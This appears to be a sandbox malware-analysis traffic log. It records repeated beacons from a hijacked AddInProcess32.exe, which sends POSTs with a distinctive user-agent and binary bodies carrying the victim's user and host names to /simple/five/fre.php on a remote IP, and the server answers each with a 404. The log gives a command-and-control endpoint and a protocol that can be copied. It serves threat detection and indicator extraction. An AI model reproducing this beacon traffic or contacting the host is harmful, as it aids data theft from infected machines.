                                                                                              Oct 24, 2024 21:23:43.957998037 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:43 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              16192.168.2.224918394.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:44.166310072 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:44.172010899 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:45.248500109 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:45 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              17192.168.2.224918494.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:45.416917086 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:45.422327042 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:46.621321917 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              18192.168.2.224918594.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:46.874614954 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:46.883325100 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:47.965843916 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:47 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              19192.168.2.224918694.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:48.401350975 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:48.406791925 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:49.409387112 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:49 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              20192.168.2.224918794.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:49.560369015 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:49.566653013 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:50.569111109 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:50 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              21192.168.2.224918894.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:50.746375084 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:50.751878023 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:51.776329041 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:51 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              22192.168.2.224918994.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:51.955508947 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:51.961137056 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:53.031290054 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:52 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              23192.168.2.224919094.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:53.499456882 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:53.505309105 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:55.553410053 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:55 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              24192.168.2.224919194.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:55.720447063 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:55.726103067 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:56.808187962 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:56 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              25192.168.2.224919294.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:56.966893911 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:56.972372055 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:23:59.106962919 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:58 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.
                                                                                              Oct 24, 2024 21:23:59.107737064 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:58 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.
                                                                                              Oct 24, 2024 21:23:59.108335018 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:23:58 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              26192.168.2.224919394.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:59.269597054 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:23:59.275065899 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:24:00.322951078 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:24:00 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              27192.168.2.224919494.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:24:00.657490969 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:24:00.662976027 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:24:01.787553072 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:24:01 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              28192.168.2.224919594.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:24:01.921905041 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:24:01.927480936 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:24:03.086314917 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:24:02 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              29192.168.2.224919694.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:24:03.255458117 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:24:03.260935068 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:24:04.455794096 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:24:04 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              30192.168.2.224919794.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:24:04.909286976 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:24:04.916021109 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:24:07.129631042 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:24:06 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              31192.168.2.224919894.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:24:07.352407932 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:24:07.357975006 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:24:08.466027021 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:24:08 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              32192.168.2.224919994.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:24:08.605921030 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
